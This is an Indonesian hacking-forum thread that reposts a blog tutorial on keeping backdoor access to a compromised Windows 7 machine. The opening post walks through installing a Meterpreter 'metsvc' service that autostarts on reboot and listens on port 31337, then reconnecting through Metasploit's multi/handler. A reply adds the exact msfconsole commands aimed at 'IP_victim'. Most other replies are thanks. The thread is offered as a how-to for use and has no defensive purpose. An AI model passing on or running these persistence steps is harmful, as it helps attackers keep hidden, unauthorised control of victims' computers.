[Share] Automatic backdoor running windows 7 ( Maintaining Access )
#1
Hmm buka email baru 3 hari juga udah puluhan email yang masuk. Pertama-tama saya mohon maaf kalo saya belum bisa membalas email teman-teman dari seluruh tanah air karena masih ada kesibukan sedikit.

Saya melihat bahwa ada sekitar 30 – an email yang bertanya pada hal yang sama.. yaitu tentang gimana agar mempertahankan backdoor yang telah berhasil di masukan dan telah sukses menuai meterpreter shell. Sebenarnya mudah sekali. Ok saya mulai ya … temen2 yang telah mengirim email kepada saya dan pertanyaannya ginian baca disni saja ya … saya gk bisa reply email temen2 satu persatu.

Ok anggaplah kita sudah mendapat meterpreter shell, gimana cara mempertahankan backdoor tersebut adalah kita harus mengupload sebuah backdoor baru yang akan terinstall kepada service local windows .. alias autorun pada saat sistem di reboot atau booting. Wah gimana caranya apakah langkahnya panjang ? .. tidak .. !! seperti yang saya bilang sebelumnya BackTrack di ciptakan sedemikian rupa untuk menjadi sebuah alat yang akan memudahkan temen2 ..

[Image: backtrack.png]

Ok tampilan screenshot di atas menandakan kita sudah mendapatkan akses meterpreter pada port 666 ( LPORT ) dan alamat ip 192.168.2.2. Bagi temen-temen yang belum ngerti masalah dapetin akses meterpreter shell pada sistem target .. ubek2 blog ini atau bisa ke forum ane .. http://indonesianbacktrack.or.id sudah banyak kok di bahas .. Smile

Pada command prompt isikan perintah run metsvc –A . Ok meterpreter akan mengupload file dan membentuk service secara otomatis … weeess okey .com … hmm secara default perintah metsvc -A tadi akan membuka sebuah service reverse pada windows 7 dengan port secara default yaitu 31337

wuzzz dia akan segera membentuk sebuah sesi ( session ) baru ..

[Image: backtrack-1.png]

What we do next ?

Okey coba reboot sistem target dan buka console baru. Ini dapat anda lakukan tiap kali anda menginginkan untuk mengkonekan diri anda pada sistem target.

Hmm jgn lupa tadi ane bilang bahwa perintah metsvc –A akan membentuk reverse karena itu kita butuh payload bind .. sip .. go on ..

Pada console msf baru .. gunakan exploit/multi/handler dan set RHOST anda (IP-TARGET) kemudian gunakan payload metsvc bind

[Image: backtrack-2.png?w=549&h=411]

ohh ,.. meterpreter langsung terbuka .. hmm hal ini kita tidak perlu capek2 lagi harus upload backdoor ato melakukan exploitasi lagi .. inilah yang dinamakan sesi maintaining access …

Ok semoga berguna ya .. klo ada waktu ane posting videonya ..

original post :
http://zeestuff.wordpress.com/2013/02/27...ng-access/
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
wah dapat ilmu baru lagi nih
trmkasih om zee eichel ilmu nya sangat berguna
izin mempelajari Smile

#3
wah dapet ilmu keren nih..
di coba dulu om zee
makasih banyak dan sangat berguna >Big Grin<

#4
keren om. ilmu baru ijin dplajari :-)
Every one Have Superiority that you don't know..

#5
makasih om............ hehehhe

#6
mantaaappp om zee, thanks.. Smile

#7
wahh keren tp yg susah mah soceng si win 7 nya Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#8
tambahan dikit dari ane abis praktek .

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/bind_tcp
msf > set RHOST IP_victim
msf > set LPORT 31337
msf > exploit

dijamin shell meterpreter kebuka kalo udah ditanem metsvc server nya . CMIIW Smile:-

#9
nice (y) btw disini ada tutor pake nexpose ga ?

#10
mantep om, ijin dicoba om..
# Yang Muda
# Yang Seharusnya Berkreasi & Berprestasi





Users browsing this thread: 1 Guest(s)